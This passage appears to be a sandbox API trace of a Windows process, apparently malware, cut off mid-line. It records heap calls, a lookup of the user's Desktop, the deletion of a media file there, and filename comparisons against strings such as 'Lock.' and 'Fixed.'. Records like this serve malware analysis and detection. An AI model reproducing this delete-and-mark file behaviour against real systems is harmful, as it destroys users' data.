[0188.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0188.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0188.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0188.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0188.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0188.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0188.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0188.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0188.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.452] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0188.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0188.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0188.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0188.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0188.452] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0188.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0188.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0188.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0188.453] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0188.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0188.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0188.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0188.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf0) returned 0x2416f30 [0188.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0188.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0188.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x72) returned 0x24202f0 [0188.455] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/OPOBoXaM2P4A0m.m4a", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OPOBoXaM2P4A0m.m4a", lpFilePart=0x8bedfc*="OPOBoXaM2P4A0m.m4a") returned 0x38 [0188.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0188.455] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OPOBoXaM2P4A0m.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\opoboxam2p4a0m.m4a")) returned 0x20 [0188.455] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OPOBoXaM2P4A0m.m4a", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8458b1b0, ftCreationTime.dwHighDateTime=0x1d4cb7e, ftLastAccessTime.dwLowDateTime=0x42db4f80, ftLastAccessTime.dwHighDateTime=0x1d4d2f0, ftLastWriteTime.dwLowDateTime=0x42db4f80, ftLastWriteTime.dwHighDateTime=0x1d4d2f0, nFileSizeHigh=0x0, nFileSizeLow=0x911e, dwReserved0=0x69, dwReserved1=0x4, cFileName="OPOBoXaM2P4A0m.m4a", cAlternateFileName="OPOBOX~1.M4A")) returned 0xaa58a0 [0188.456] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OPOBoXaM2P4A0m.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\opoboxam2p4a0m.m4a")) returned 1 [0188.458] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8458b1b0, ftCreationTime.dwHighDateTime=0x1d4cb7e, ftLastAccessTime.dwLowDateTime=0x42db4f80, ftLastAccessTime.dwHighDateTime=0x1d4d2f0, ftLastWriteTime.dwLowDateTime=0x42db4f80, ftLastWriteTime.dwHighDateTime=0x1d4d2f0, nFileSizeHigh=0x0, nFileSizeLow=0x911e, dwReserved0=0x69, dwReserved1=0x4, cFileName="OPOBoXaM2P4A0m.m4a", cAlternateFileName="OPOBOX~1.M4A")) returned 0 [0188.458] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0188.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.459] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0188.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0188.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0188.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0188.459] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0188.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0188.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0188.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0188.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0188.460] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0188.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0188.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0188.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0188.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0188.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0188.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf0) returned 0x2416f30 [0188.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0188.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0188.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0188.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0188.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x72) returned 0x24202f0 [0188.463] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/OPOBoXaM2P4A0m.m4a", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OPOBoXaM2P4A0m.m4a", lpFilePart=0x8bf658*="OPOBoXaM2P4A0m.m4a") returned 0x38 [0188.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0188.463] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OPOBoXaM2P4A0m.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\opoboxam2p4a0m.m4a")) returned 0xffffffff [0188.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.463] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0188.463] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.464] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0188.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0188.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0188.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0188.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0188.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0188.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0188.482] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OPqP3gN.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PqP3gN.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qP3gN.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P3gN.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3gN.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gN.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.483] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0188.483] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0188.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0188.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0188.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0188.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0188.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0188.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0188.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0188.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OPqP3gN.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PqP3gN.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qP3gN.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P3gN.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3gN.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0188.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gN.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0188.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 